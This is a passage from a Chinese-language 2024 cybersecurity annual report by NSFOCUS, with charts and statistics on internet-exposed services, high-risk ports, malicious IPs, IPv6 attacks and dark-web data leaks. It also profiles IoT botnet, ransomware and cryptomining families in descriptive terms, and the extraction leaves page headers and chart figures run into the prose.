服务、数据库服务和邮件服务应用最为广泛,因此,接下来重点对这三类服务的分布情况进行研究分析。全国范围内,这三类服务最多的省市分别是北京、香港特别行政区和台湾。其中,Web 服务应用最多,占比为 71.67%,应用数量TOP3 的省市分别为北京、香港和广东,如图 2.3 所示。数据库服务和邮件服务应用数量较多的省市分别为北京、广东、上海和浙江。北京市作为向全世界展示我国形象的首要窗口,将建设成为全球数字经济标杆城市,信息化水平处于国内领先地位,三类服务的应用数量排名第一。香港特别行政区有着得天独厚的地理位置,邻近大陆,是大湾区的核心,三类服务的应用排名第二名。广东省是经济最发达的珠三角地区,三类服务的应用排名第三。三类服务的应用数量排名第四到第十名的依次是上海市、浙江省、江苏省、台湾省、四川省、山东省和陕西省,这与数据经济发达程度是相符的。网络安全2024-守初心 创新质绿盟版3-13排版.indd 18网络安全2024-守初心 创新质绿盟版3-13排版.indd 182024/5/8 17:42:582024/5/8 17:42:58019安全态势篇北京市香港特别行政区广东省上海市浙江省江苏省台湾省四川省山东省陕西省Web服务29617433 1254515773068994600204425342229607762731040215800119258591825025数据库服务548324339111244991157061114621420641742641556297875468邮件服务2546406119904297093214379918777163997455698521119219542905000000100000001500000020000000250000003000000035000000暴露数量(个)图 2.3 互联网重要服务分布 TOP10 省市全国暴露在互联网上的数据库服务数量为 1,921,076,如图 2.4 所示,暴露的数据库基本覆盖了常见数据库类型,例如 MySQL、CouchDB、Splunkd、Microsoft SQL Server、Redis 等。数据库服务暴露在互联网上将会带来巨大的安全风险,黑客在获取数据库权限后会进行拖库、洗库等一系列操作,甚至利用这些数据进行勒索,危害极大。因此,应及时关闭非必要开放的数据库服务,及时更新最新版本和安装补丁,对必须开放的数据库服务严格进行访问控制,避免数据库被攻陷后带来的重大影响。网络安全2024-守初心 创新质绿盟版3-13排版.indd 19网络安全2024-守初心 创新质绿盟版3-13排版.indd 192024/5/8 17:42:582024/5/8 17:42:58020网络安全 2024:守初心 创新质84459227944327866821094816512635806352881717014244126720100000200000300000400000500000600000700000800000900000标题图 2.4 数据库服务类型分布全国暴露在互联网上的邮件服务数量为 31,046,317,如图 2.5 所示,主要包括 IMAP、POP 和 SMTP 等类型。邮件服务也是黑客最常用的网络攻击渠道之一,攻击者往往会利用邮件传播恶意软件、窃取身份验证、实施网络钓鱼和金融诈骗等。3076819617570410241705000000100000001500000020000000250000003000000035000000IMAPPOPSMTP标题图 2.5 邮件服务类型分布网络安全2024-守初心 创新质绿盟版3-13排版.indd 20网络安全2024-守初心 创新质绿盟版3-13排版.indd 202024/5/8 17:42:582024/5/8 17:42:58021安全态势篇2.2 高风险主机2.2.1 高风险端口开放情况在互联网上暴露高风险服务端口,会降低系统的安全性,增加黑客攻陷系统的概率。在本年的热点事件中,除了传统的高危 21、22 端口,3389 端口和 2375 端口也频繁被黑客或APT 组织利用,安全风险很大。通过绿盟威胁情报中心的统计,全国开放了高风险端口的资产数量共计 13,097,291 个,如图 2.6 所示。其中,开放 21、22、3389 和 2375 端口的资产数量占比分别为 45.18%、42.08%、12.18%和 0.019%。59879235511489159529825810100000020000003000000400000050000006000000700000021端口22端口3389端口2375端口标题图 2.6 高风险端口势态从地理分布上看,香港特别行政区暴露在互联网上的总资产最多,开放高风险端口也是最多的,总计开放端口数量为2,143,003个,其次是江苏省和山东省,分别开放端口数量为1,285,836个和 1,191,562 个,高风险端口的开放情况基本与各省市暴露的总资产数量成正相关。网络安全2024-守初心 创新质绿盟版3-13排版.indd 21网络安全2024-守初心 创新质绿盟版3-13排版.indd 212024/5/8 17:42:582024/5/8 17:42:58022网络安全 2024:守初心 创新质0500,0001,000,0001,500,0002,000,0002,500,00021端口(FTP)22端口(SSH)2375端口(Docker)3389端口(远程桌面)图 2.7 高风险端口地理分布 TOP10 省市2.2.2 运营商高风险属性情况从所属运营商分布上看,中国电信暴露在互联网上的高风险资产数量最多,也即开放高风险端口是最多的,总计开放高风险端口数量为 4,068,635 个,其次是中国联通和阿里云,开放高风险端口数量分别为 3,436,365 个和 1,757,387 个,高风险端口的开放情况基本与与运营商的规模体量成正相关。排名第四到第十位的分别是腾讯、华为、鼎峰新汇香港科技有限公司、中国移动、中华电信股份有限公司、动力线(香港)有限公司、clayer limited,都是知名的运营商。网络安全2024-守初心 创新质绿盟版3-13排版.indd 22网络安全2024-守初心 创新质绿盟版3-13排版.indd 222024/5/8 17:42:582024/5/8 17:42:58023安全态势篇050000010000001500000200000025000003000000350000040000004500000标题图 2.8 高风险资产所属运营商分布 TOP10从应用场景分布上看,数据中心应用场景在互联网上暴露的高风险资产最多,开放高风险端口最多的,总计开放端口数量为6,186,123个,其次是家庭宽带和企业专线两种应用场景,分别开放高风险端口数量为 6,142,575 个和 588,661 个,高风险端口的开放情况基本与与应用场景依赖远程的程度成正相关。后续排名分别是学校单位、专用出口、基础设施、移动网络等。网络安全2024-守初心 创新质绿盟版3-13排版.indd 23网络安全2024-守初心 创新质绿盟版3-13排版.indd 232024/5/8 17:42:582024/5/8 17:42:58024网络安全 2024:守初心 创新质01000000200000030000004000000500000060000007000000数据中心家庭宽带企业专线学校单位专用出口基础设施移动网络组织机构标题图 2.9 高风险资产所属应用场景分布2.3 恶意 IP 态势2.3.1 攻击类型绿盟威胁情报中心根据 2023 年参与到各类攻击事件的 IP 地址进行统计分析,其中恶意IP 参与较多的网络攻击事件包括拒绝服务、扫描探测、恶意软件、暴力破解、漏洞利用、钓鱼与欺诈等,具体分布如图 2.10 所示。其中,拒绝服务和扫描探测是占比较高的两种网络攻击类型,两类总和占到接近一半的比例。这两种行为通常会有大量节点的参与,与观测结果一致。我们发现,拒绝服务攻击的占比在 2023 年出现了较大的提高。2022 年内,拒绝服务攻击占比 17%,排名第三;在今年一跃成为占比第一的攻击类型。该类攻击因攻击成本低、攻击效果明显等特点,成为了互联网用户面临的最常见网络安全威胁之一。网络安全2024-守初心 创新质绿盟版3-13排版.indd 24网络安全2024-守初心 创新质绿盟版3-13排版.indd 242024/5/8 17:42:592024/5/8 17:42:59025安全态势篇拒绝服务26%扫描探测23%恶意软件下载12%暴力破解10%漏洞利用8%钓鱼与欺诈6%僵尸网络主控端5%Web攻击4%垃圾邮件4%暗网通信2%网络挖矿0%图 2.10 恶意 IP 攻击类型分布2.3.2 攻击源地理分布据绿盟威胁情报中心统计,从攻击源 IP 的地理分布来看,广东、江苏、浙江、山东、河南等 IP 数量位于前列,如图 2.11 所示。经济相对发达的省份,网络规模大,被黑客控制并利用来参与网络攻击的比例也更高。网络安全2024-守初心 创新质绿盟版3-13排版.indd 25网络安全2024-守初心 创新质绿盟版3-13排版.indd 252024/5/8 17:42:592024/5/8 17:42:59026网络安全 2024:守初心 创新质0200000400000600000800000100000012000001400000160000018000002000000广东省 江苏省 浙江省 山东省 河南省 福建省 安徽省 辽宁省 湖北省 四川省图 2.11 国内恶意 IP 地理分布2.3.3 攻击目标地理分布从攻击目标 IP 的地理分布来看,广东省、江苏省、上海市的攻击目标 IP 数量分列前三位,都达到了 20 万个以上,具体分布如图 2.12 所示。050000100000150000200000250000300000350000图 2.12 攻击目标全国分布网络安全2024-守初心 创新质绿盟版3-13排版.indd 26网络安全2024-守初心 创新质绿盟版3-13排版.indd 262024/5/8 17:42:592024/5/8 17:42:59027安全态势篇2.4 IPv6 安全态势2023 年,绿盟威胁情报中心选取了国内数百家部署了 IPv6 业务的典型单位(行业覆盖政府、教育、能源、医疗、交通等主要行业),对这些客户 IPv6 环境在 2023 年遭受到 IPv6攻击告警日志进行分析,观察国内 IPv6 环境下的单位面临的威胁状况。2.4.1 IPv6 漏洞基于 NVD 数据库收录漏洞的观察,从 2002 年起累计公布的 IPv6 漏洞共有 536 个。其中,2023 年新增了 36 个 IPv6 漏洞。从总体上看,自 2010 年后,IPv6 相关漏洞一直保持着不断增长的趋势。2 5 6 10 7 17 10 10 11 20 24 26 20 37 14 67 31 25 79 46 33 36 01020304050607080902,0022,0032,0042,0052,0062,0072,0082,0092,0102,0112,0122,0132,0142,0152,0162,0172,0182,0192,0202,0212,0222,023漏洞数量(单位:个)图 2.13 2002 年以来 IPv6 相关漏洞统计值得注意的是,IPv6 的高风险漏洞比例较高,以 2023 年为例,IPv6 严重和高危风险的漏洞占到 IPv6 总体漏洞的 64%,高于 IPv4 中的 53%。网络安全2024-守初心 创新质绿盟版3-13排版.indd 27网络安全2024-守初心 创新质绿盟版3-13排版.indd 272024/5/8 17:42:592024/5/8 17:42:59028网络安全 2024:守初心 创新质严重8%高危56%中危36%低危0%图 2.14 2023 年 IPv6 安全漏洞等级分布2.4.2 攻击源地理分布绿盟威胁情报中心通过对数百家国内 IPv6 部署单位的攻击告警数据进行分析,统计国内典型客户遭受的攻击特点。在统计的数百家单位中,全年遭受到了近 50 万个来自全球的 IPv6 地址的攻击,其中绝大部分攻击源位于国内,占比 98%。在近 3 年的攻击源统计中可以发现,位于国内的攻击源占比持续增长,目前已远超国外攻击源数量。可见,要提升 IPv6 网络环境安全,关键是要对境内 IPv6 主机的失陷和滥用行为进行监测和治理。国内35%国外65%国内94%国外6%国内98%国外2%图 2.15 近 3 年 IPv6 攻击源境内外分布(从左到右依次为 2021 年到 2023 年)网络安全2024-守初心 创新质绿盟版3-13排版.indd 28网络安全2024-守初心 创新质绿盟版3-13排版.indd 282024/5/8 17:42:592024/5/8 17:42:59029安全态势篇分析来自国内的 IPv6 攻击源地址,发现江西、江苏、广东、河南、山东排名前五。参考本报告 2.3.2 章节,国内 IPv4 攻击源排名靠前的省份,在 IPv6 攻击源中排名也基本靠前。这些省份中多数经济相对发达、产业规模更大,面临的资源滥用误用风险也更大。因此,IPv6的安全建设应跟各省 IPv6 业务建设同步发展,否则容易出现 IPv6 应用后整体安全能力反而下降的问题。0200040006000800010000120001400016000江西省 江苏省 广东省 河南省 山东省 福建省 辽宁省 北京市 安徽省 陕西省图 2.16 2023 年 IPv6 攻击源国内前 10 分布2.4.3 攻击类型据绿盟威胁情报中心统计,2023 年恶意 IPv6 地址参与恶意网络攻击的主要类型分布如下图所示。其中,漏洞利用、暴力破解、扫描探测、DDoS 等是排名靠前的网络攻击类型,分别占比 41%、23%、17%和 15%。网络安全2024-守初心 创新质绿盟版3-13排版.indd 29网络安全2024-守初心 创新质绿盟版3-13排版.indd 292024/5/8 17:42:592024/5/8 17:42:59030网络安全 2024:守初心 创新质漏洞利用41%暴力破解23%扫描探测17%拒绝服务15%Web攻击3%恶意软件下载1%网络挖矿0%图 2.17 IPv6 攻击类型分布具体来看,发生次数较多的攻击事件如下。UDP-Flood 在 DDoS 攻击中占到很高比例;黑客常对 FTP、HTTP 和 SNMP 等服务进行暴力破解。可以发现,与 IPv4 类似,IPv6 的攻击方式复杂,攻击手段多样,涉及 DDoS、漏洞利用和僵木蠕等多种类型,挖矿相关行为也时有发生。表 2.1 IPv6 常见攻击事件攻击类型排名攻击名称1UDP-Flood 淹没拒绝服务攻击2FTP 服务用户弱口令认证3SNMP 服务访问使用默认 private 口令4Avaya Hidden Community String 攻击5watchdogs 挖矿木马 DNS 通信6挖矿程序查询 DNS 矿池服务器域名7HTTP 服务目录遍历漏洞8挖矿蠕虫 WannaMine 连接 DNS 服务器通信9恶意程序 windows/PowerGhost_a 网络通信10HTTP 服务认证弱口令登录2.5 暗网态势通过建立对暗网资源的实时监控,绿盟科技发现了2023 年国内外的大量数据泄露事件。这些泄露的数据内容主要是个人信息,可能包括姓名、身份证号、电话、地址、邮箱、银行卡等关键隐私内容。为了探究我国相关数据在这些事件中的情况,我们从多个角度进行了分析。2023 年内,共发现与中国相关的数据泄露 5,630 次,其中,大部分为不同平台、网站的网络安全2024-守初心 创新质绿盟版3-13排版.indd 30网络安全2024-守初心 创新质绿盟版3-13排版.indd 302024/5/8 17:42:592024/5/8 17:42:59031安全态势篇个人隐私信息,主要包括用户个人信息、用户消费记录、单位员工信息等。根据这些泄露事件的交易描述,在初步去重后,我们发现其中至少包含 446 亿条信息,横跨金融、电商、教育、医疗、能源、政府等多种领域,涉及儿童、老人、孕妇、重要单位员工等多种人群。可见,2023 年内,我国的数据泄露情况不容乐观,公民数据安全风险高。图 2.18 泄露清单示例我们对上述信息进行了深入分析,从不同的角度对其分类统计,以探寻这些数据泄露事件所覆盖的范围、影响的领域和人群。2.5.1 涉及行业领域通过对 2023 年对数据泄露交易信息进行分析,观察到不同行业数据泄露情况,按照泄露事件数和泄露数据量分别进行统计。根据统计,监测到的数据中,泄露事件数从多到少依次为金融、教育、电商、重要单位组织机构、物流、医疗和工业。而根据泄露的数据量,则依次为电商、物流、金融、教育、重要单位组织、工业和医疗。可以发现,金融、电商和教育这三个领域,不论是泄露事件数,还是泄露数据量,都占有较高的比重。其中,金融领域的泄露事件数达到了 40.9%,远超其他几类;泄露数据量则是占到 6.7%。金融领域的泄露主要涉及到银行用户信息、贷款用户信息、股票投资信息等。这些数据的泄露很容易造成直接的经济损失,这也导致了不法分子更倾向于频繁窃取、贩卖金融领域的相关数据。电商领域的泄露事件数占比为 7.6%,但是其中包括的数据量却最高,占到了 49.7%,远超其他几类。其泄露内容主要包括网购订单数据和平台用户信息。国内的几家头部电商平台,由于其极高的覆盖度和使用率,一旦发生数据泄露,其规模有可能远超其他行业。这也是2023 年电商领域泄露数据量高的原因。网络安全2024-守初心 创新质绿盟版3-13排版.indd 31网络安全2024-守初心 创新质绿盟版3-13排版.indd 312024/5/8 17:42:592024/5/8 17:42:59032网络安全 2024:守初心 创新质重要单位组织机构占到 7.4%的泄露事件数,数据量则只有 0.5%。其中主要是重要单位收集存储的公民信息,以及重要单位内部人员信息,包括政府机关、研究所、大型企业等。前者往往内容真实且全面,后者更是涉及到国家安全稳定,因此这两类数据的泄露往往会造成极大的隐患。在“其他”一栏中,主要是生活工作常用的平台和软件,包括社交平台、视频和音乐软件和办公软件等。这些来源的泄露事件数占比11.7%,泄露数据量却达到28.3%。与电商类似,其高覆盖度和使用率同样导致其泄露规模通常较大。该领域的泄露内容主要为用户注册信息,包括绑定的手机号、社交账号、邮箱等。这些数据的覆盖度极广,涉及到生活的方方面面;不同账号之间的绑定关系更是加深了其覆盖范围。不法分子在这些数据中能够顺藤摸瓜,不管是大规模的骚扰、诈骗,还是有针对性的攻击,都会更有可乘之机。金融40.9%教育14.8%电商7.6%重要单位组织机构7.4%物流6.8%医疗6.3%工业4.6%其他11.7%图 2.19 2023 年国内数据泄露涉及行业(事件数)网络安全2024-守初心 创新质绿盟版3-13排版.indd 32网络安全2024-守初心 创新质绿盟版3-13排版.indd 322024/5/8 17:43:002024/5/8 17:43:00033安全态势篇电商49.7%物流11.4%金融6.7%教育3.4%重要单位组织机构0.5%工业0.1%医疗0.1%其他28.3%图 2.20 2023 年国内数据泄露涉及行业统计(数据量)2.5.2 涉及人群观察交易信息,可以发现其中有很多都对数据内容进行了简单介绍。其中可以发现,泄露数据涉及到的人群有明显的倾向性:一方面,一些人群相关的数据在交易平台中频繁出现;另一方面,不法分子会在售卖高价值信息时标出关键字眼,以吸引买家注意。统计其中出现的人群相关关键词,其结果如图 2.21 所示。1,030 56 324 02004006008001,0001,200脆弱人群关键人群高净值人群出现次数图 2.21 数据泄露针对人群分布网络安全2024-守初心 创新质绿盟版3-13排版.indd 33网络安全2024-守初心 创新质绿盟版3-13排版.indd 332024/5/8 17:43:002024/5/8 17:43:00034网络安全 2024:守初心 创新质大量的数据泄露内容与脆弱群体相关,这里的脆弱群体主要包括儿童、老人、宝妈、大学生等人群。由于其消费习惯、防范意识等方面的因素,危险分子选择这类人群作为重点关注的群体。类似地,不法分子也倾向于关注高净值人群和关键人群的信息。在对泄露数据的描述中常常会出现“富人”“豪宅”等指向高净值人群的词语,这些泄露数据可能会造成巨大的经济损失。而关键人群主要为政府、大型企业等关键单位员工,其中可能会包含高层领导、知名教授、企业高管等人群,这些人群的信息一旦泄露,则可能会对国家和社会造成严重危害。可以看出,不法分子出于其经济利益等因素,在选择泄露数据时具有明显的倾向性,导致部分人群面临的风险更高。2.5.3 涉及地区在 5630 次数据泄露中,有部分提及了数据的地域信息。在图 2.22 中列出了被提及次数最多几个省份,其中前三名分别是广东省、北京市和台湾省。可以发现,经济较为发达、人口数量多的省份,更容易发生数据泄露。75787899108114115119129147湖北省山东省湖南省上海市江苏省浙江省四川省台湾省北京市广东省图 2.22 数据泄露相关省份 TOP102.5.4 涉及内容在泄露数据中,有很多对其中包含的数据字段进行了描述。其中,身份证、手机号、地网络安全2024-守初心 创新质绿盟版3-13排版.indd 34网络安全2024-守初心 创新质绿盟版3-13排版.indd 342024/5/8 17:43:002024/5/8 17:43:00035安全态势篇址和密码等字段出现次数较多,邮箱、银行卡等也有所提及。这些数据的泄露,很容易导致身份盗用、网络诈骗等事件的发生。703622854240148507身份证地址手机邮箱银行卡密码图 2.23 泄露数据中的已知字段2.5.5 活跃账号在一些交易平台,可以看到发布交易信息的账号。我们对 2023 年下半年的发布交易信息的账号进行了统计分析。在下半年,共发现 776 个账号发布过交易信息。这些账号呈现明显的长尾分布,有 552个账号只发布过 1-3 次泄露数据,约占 71%;有 4 个账号发布数量超过 100 次,呈现极端活跃的状态。网络安全2024-守初心 创新质绿盟版3-13排版.indd 35网络安全2024-守初心 创新质绿盟版3-13排版.indd 352024/5/8 17:43:002024/5/8 17:43:00036网络安全 2024:守初心 创新质4 19 28 66 107 552 0100200300400500600100次以上20-100次10-20次5-10次3-5次1-3次账号数图 2.24 不同账号发布泄露数据的次数分布其中,有一条极端活跃的账号,发布次数最多,共发布了257次泄露数据:发布数据量极大,至少有 11 亿条数据。这个账号发布的泄露数据涉及多个行业、多种人群,覆盖范围极广。除了一条最极端活跃的账号,其他活跃账号发布的数据所包含的条数普遍并不多:发布次数排名 2-20 的账号中,泄露的数据共 5.58 亿条,只占到总数的 1%;而发布大规模泄露的账号,则普遍只有寥寥几次的发布记录。观察这些活跃账号,可以发现其中一些具有明显的倾向性:很多账号的发布内容集中在金融领域,包括银行客户信息、网贷信息;某账号发布了大量某款股民常用软件的用户信息。2.6 恶意软件威胁态势2.6.1 IoT 恶意软件2023 年度,绿盟科技伏影实验室监测到的 IoT 恶意软件主要为 Mirai、Gafgyt 和XorDDoS,以 DDoS 家族为主。其中,Mirai 及其变种家族,无论是肉鸡数量(35%)、下发指令(86%)以及 C&C 数量(47%)均位列全球之首,是 IoT 平台上最大最活跃的威胁势力。开源家族衍生方面,由 Mirai 和 Gafgyt 及两者共同变化出的新家族层出不穷,而伏影实验室也在 2023 年度共发现了超过 13 个上述两个家族的变种家族。其中,LockerBot(5%)、网络安全2024-守初心 创新质绿盟版3-13排版.indd 36网络安全2024-守初心 创新质绿盟版3-13排版.indd 362024/5/8 17:43:002024/5/8 17:43:00037安全态势篇Miori(4%)、hailBot(3%)是本年度感染量最大的新型 Mirai 变种。Mirai47%hailbot13%Gafgyt12%Miori10%billgates5%MiraihailbotGafgytMioribillgatesfbotxorddosTSUNAMIDOFLOONekonebotCatDDoSZnaichHYBRIDMQperlIRCBOTKiraiBot mirai35%Mozi25%Muhstik11%Gafgyt7%LockerBot5%Miori4%hailBot3%miraiMoziMuhstikGafgytbillgatesLockerBotMiorihailBotVapeBotXORDDoSCatDDoS图 2.25 IoT 平台僵尸网络各家族控制资源情况Mirai86%Gafgyt9%Xorddos5%MiraiGafgytXorddoshailbotLockerBotCatDDoS2SDBOTRDDoSVapeBotTSUNAMIDOFLOOsuBot 0100000200000300000400000500000600000700000平台各僵尸网络家族指令数图 2.26 IoT 平台僵尸网络各家族指令下发情况自研家族方面,伏影实验室分别在 2023 年 8 月和 11 月监测到 RDDoS 与 XorBot 这两个采用全新架构并持续升级的 DDoS 家族。此外,2022 出现的 Boat、KmsdBot、RedGoBot、Yeskit、RapperBot 等家族依然在持续活动。攻击活动方面,IoT DDoS 家族发起的攻击活动于年度大幅度增加。美国(36%)、中国(23%)、德国(7%)、加拿大(4%)受到最多攻击。对于中国国内,受攻击目标主要位于大湾区、江浙等沿海发达地区。网络安全2024-守初心 创新质绿盟版3-13排版.indd 37网络安全2024-守初心 创新质绿盟版3-13排版.indd 372024/5/8 17:43:012024/5/8 17:43:01038网络安全 2024:守初心 创新质010000200003000040000500006000070000美国中国德国加拿大法国新加坡荷兰United Kingdom韩国巴西英国俄罗斯波兰澳大利亚土耳其伊朗越南日本沙特阿拉伯西班牙罗马尼亚瑞士芬兰意大利卢森堡其他攻击目标分布图 2.27 受害者分布情况感染传播方面,IoT 恶意家族使用了超过 150 多种不同的漏洞进行传播。其中,路由器(38%)成为最受攻击者青睐的立足设备。扩大影响力方面,依然存在 IoT 攻击团伙采取高调策略的情况,利用如 Youtube、Twitter 的互联网社交平台及 Telegram、QQ 这样的即时通讯平台作为活动阵地。攻击业务方面,多个控制 IoT 家族的攻击团伙均不同程度地发生了业务转型,从单一业务扩展到 DDoS 和挖矿兼具模式,以尽可能扩大攻击面以攫取更多利益。2.6.2 新型 IoT 僵尸网络家族 hailBot2023 年 9 月,绿盟科技伏影实验室首次检测并披露 hailbot 僵尸网络。该家族修改自Mirai 源码,通过漏洞利用和弱口令扫描爆破的方式进行传播,支持基于 TCP 和 UDP 协议在内的多种 DDoS 攻击方式。根据溯源,hailbot 的控制者早年经营 Windows 窃密木马托管业务,后来于 2022 年底开始布局 hailbot 僵尸网络,开始针对 IoT 平台进行 DDoS 攻击活动。据统计,hailbot 至今已拥有超过 500 个 C&C,其攻击目标主要集中在新加坡,美国和加拿大等地,观察表明,hailbot 的控制者为取得更好攻击效果,发展出了多级 C&C 结构,在隐藏核心基础设施的同时,还可提高其分布式攻击的同步性,有利于制造更大规模的 DDoS 攻击。网络安全2024-守初心 创新质绿盟版3-13排版.indd 38网络安全2024-守初心 创新质绿盟版3-13排版.indd 382024/5/8 17:43:012024/5/8 17:43:01039安全态势篇 RDDoS2023 年 8 月,绿盟科技伏影实验室捕获到新型 DDoS 僵尸网络家族 RDDoS。该家族采用 Golang 编写,使用全新架构,自 8 月至 10 月间产生了多个变种,在 DDoS 方式、C&C 端口、代码结构等方面进行修改,迭代迅速。监测数据显示,RDDoS在攻击活动中主要使用ICMP泛洪对目标发起24小时不间断攻击,占到总体活动的八成左右。目标方面,RDDoS 的攻击对象包含了美国、巴西、法、中国、德国以及荷兰等国家。此外,RDDoS 还具备了命令执行能力,使得其威胁性进一步提高。近年来,僵尸网络在高级威胁中的参与度逐渐提升,作为 APT 攻击或勒索组织渠道的事件也有发生,需要警惕。CatDDoS2023 年 9 月,绿盟科技伏影实验室监测到基于 Mirai 开发而来的新型家族 CatDDoS。该家族在 Mirai 源码的基础上引入了 ChaCha20 算法,以保护关键信息。CatDDoS 内置多种 DDoS 攻击方式。而在实际活动中,攻击者倾向于使用 ACK 与和GREIP 两种泛洪攻击方式,分别占到 63%和 29%。监测数据显示,CatDDoS 家族的指令下发动作较为频繁,攻击目标包括中、美、日、法及新加坡等国,攻击时段多以早上 8 点至晚上 9 点。此外,CatDDoS 在通信隐匿性上也有所设计,通过引入 OpenNIC 域名来起到隐匿真实C&C IP 的作用,这与 2022 年出现的 Fodcha 家族颇为相似。XorBot2023 年 11 月,绿盟科技伏影实验室首次发现 XorBot,并很快检测到其变种出现。该家族是从一个从零开始构建的新型僵尸网络家族,采用了全新架构,正在快速成长中。不同于传统家族,XorBot 采用被动接收的上线模式,在与控制端建立连接后并不急于主动发送上线包,而是被动等待控制端回复。这对依赖 Fakenet 的沙箱检测形成了挑战。此外,该家族的变种链入了大量无效代码,影响静态检测,一度导致 VT 检出率为 0。XorBot 背后存在着专业化攻击团伙,其自研代码中并未包含脆弱性利用代码,而是使用独立的传播工具,这将有利于隐匿其传播技术,以防止 0day 与木马本体被捕获分析一锅端。2.6.3 勒索软件主流家族网络安全2024-守初心 创新质绿盟版3-13排版.indd 39网络安全2024-守初心 创新质绿盟版3-13排版.indd 392024/5/8 17:43:012024/5/8 17:43:01040网络安全 2024:守初心 创新质 LockBit 家族LockBit 勒索软件于 2019 年 9 月首次出现。随着时间的推移,该软件不断迭代更新,于2021 年升级至 LockBit 2.0 版本,并在 2022 年 6 月更新至 LockBit 3.0。LockBit 采用了近年来较为流行的双重勒索模式,即通过加密受害者文件并要求支付赎金来恢复数据,同时以公开泄露数据为要挟,迫使受害者再次支付费用。LockBit 的运营模式基于勒索软件即服务(RaaS),其中初始访问代理(IAB)负责部署恶意软件或获取目标组织内部的基础设施访问权限。随后,这些访问权限被出售给多个LockBit 运营商,用于进一步的开发和利用。2023 年,LockBit 的攻击活动日益频繁。据英国金融时报报道:2023 年 11 月 9 日,某大型国有银行的金融服务部门遭受了 LockBit 勒索软件的攻击。这次攻击导致部分业务受阻,股票交易也受到影响。虽然此次攻击对美国国债市场的流动性产生了一定影响,但并未损害市场的整体运作。针对此次事件,银行方面回应称受到攻击的是其金融服务业务,该业务与集团主体业务相互独立。同时,银行强调其总行及其他境内外关联机构的系统并未受到此次事件的影响,位于纽约的分行也未受影响。TellYouThePass 家族Tellyouthepass 勒索病毒家族自 2019 年 3 月以来持续活跃,其在国内的传播尤为广泛,主要将矛头指向国内的 Web 应用服务器。该家族偏好利用各类热门漏洞武器进行攻击传播,并运用 RSA AES 加密算法对文件进行加密。近年来,其活动极为频繁:2020 年 7 月,TellYouThePass 勒索病毒利用永恒之蓝漏洞对多家企业发起攻击;2021年12月,该病毒利用Log4J2漏洞在Linux及Windows平台上重现;2022年8月,TellYouThePass利用某财务软件的0day漏洞发动勒索攻击;直至2023年11月,攻击者再次利用网络空间测绘等平台预先收集并识别出暴露在互联网的某医药系统,进而利用该系统漏洞上传WebShell,通过连接WebShell向目标机器投送 Tellyouthepass 勒索病毒。BlackCat 家族BlackCat 勒索软件(又名 AlphaVM、AlphaV 或 ALPHV)最早于 2021 年 11 月中旬披露,该木马使用 RUST 语言编写,具备高度定制化的特点。研究表明,BlackCat 勒索软件已与 Conti、LockBit 和 REvil 等其他知名勒索软件家族开展合作。早在 2021 年 12 月初,该团伙便通过俄罗斯地下犯罪论坛积极寻求合作伙伴。其制定的网络安全2024-守初心 创新质绿盟版3-13排版.indd 40网络安全2024-守初心 创新质绿盟版3-13排版.indd 402024/5/8 17:43:012024/5/8 17:43:01041安全态势篇条款里,合作伙伴将获得 80%-90%的赎金份额,而剩余的份额将归属于 BlackCat 开发团队。近年来,BlackCat 团伙的攻击频率呈现出持续增长的态势,且他们攻击目标大多数集中在美国企业,同时,欧洲和亚太地区的组织也是其重要的攻击目标。金融、专业服务、法律服务等行业是 BlackCat 勒索组织密切关注的重点领域。2.6.4 挖矿木马主流家族“8220”挖矿组织“8220”是一个自 2017 年起便开始持续活跃的挖矿组织,因其经常使用 8220 作为C&C 通信端口而得名,该组织习惯于依靠简单、公开、可用的漏洞来传播恶意软件,其常用工具集包括 Tsunami 恶意软件和 XMRig 加密挖矿程序。该组织长期以来一直针对云和容器环境中的应用程序发起攻击,然后部署加密货币挖矿程序。2023 年 5 月,该组织利用 WebLogic 服务器中的一个高严重性远程代码执行漏洞 CVE-2020-14883(CVSS 评分:7.2)来传播他们的恶意软件。该次攻击活动使用的攻击组件除了包含该漏洞的 XML 文件,还有 Agent Tesla 等后续负责部署窃密软件和挖矿软件的组件。该活动的攻击目标包括美国、南非、西班牙、哥伦比亚和墨西哥的医疗保健、电信和金融服务部门。TeamTNTTeamTNT 挖矿组织最早于 2019 年被发现,其命名源自组织早期使用的域名 teamtnt.red,TeamTNT 挖矿组织攻击目标包括 Docker Remote API 未授权访问漏洞、配置错误的Kubernetes 集群以及 Redis 服务暴力破解。目前,该组织已发展成为针对 Linux 服务器进行挖矿的主要攻击组织之一。2023 年 6 月,TeamTNT 组织在其工具中新增了针对 Azure 和 Google 云平台的模块。尽管这些功能尚未被调用,但表明这些功能正在积极开发中,可能会在未来的攻击活动中使用。2023 年 7 月,TeamTNT 组织发起了针对云原生环境的攻击活动,研究人员在本次攻击活动中发现了用于实施攻击的基础设施。这些基础设施正处于测试和部署的早期阶段,主要针对暴露的 JupyterLab 和 DockerAPI 进行攻击,接着传播 Tsunami 恶意软件,并进一步进行云凭据劫持、资源劫持和蠕虫感染等攻击活动。WatchDog 挖矿组织网络安全2024-守初心 创新质绿盟版3-13排版.indd 41网络安全2024-守初心 创新质绿盟版3-13排版.indd 412024/5/8 17:43:012024/5/8 17:43:01042网络安全 2024:守初心 创新质WatchDog 挖矿组织于 2019 年 1 月首次被发现,其命名来源于木马运行后创建的守护进程名watchdogd。该组织习惯于利用暴露的Docker Engine API端点和Redis服务器发起攻击,通过使用开放端口 2375 破坏配置错误的 Docker Engine API 端点来发起攻击,使它们能够在默认设置下访问守护进程,并且能够迅速扩散至整个网络,感染更多设备。2023 年,该团伙活动极为频繁,WatchDog 挖矿组织具备跨平台攻击能力,在 Windows平台,该组织在攻击活动中首先会从下载站点上下载名为“init.ps1”的 PowerShell 脚本,运行该脚本后会接着下载挖矿程序和漏洞扫描程序等后续组件。在 Linux 平台,WatchDog会下载名为“init.sh”的 sh 脚本,该脚本同样会下载 Linux 端的挖矿程序、漏洞扫描程序等组件,功能与 Windows 平台一致。另外,其攻击组件还具具备清空防火墙规则、清除日志、创建计划任务、结束安全产品、添加 SSH 公钥、结束竞品挖矿、横向移动和结束特定网络连接等功能。2.6.5 窃密木马主流家族 Gh0st 银狐版Gh0st 作为一款 Windows 远程控制工具,早年间开源后成为黑产组织手中的香饽饽,经改造产生了海量变种,长期肆虐于 Windows 平台。2023 年,这些变种依旧极其活跃,其中以银狐 Gh0st 尤甚。银狐 Gh0st 主要通过利用社交工程 即时通信软件钓鱼的方式传播。该团伙会想方设法寻找目标诸如社交媒体账号、客服等暴露于互联网的联系方式,添加对方微信或 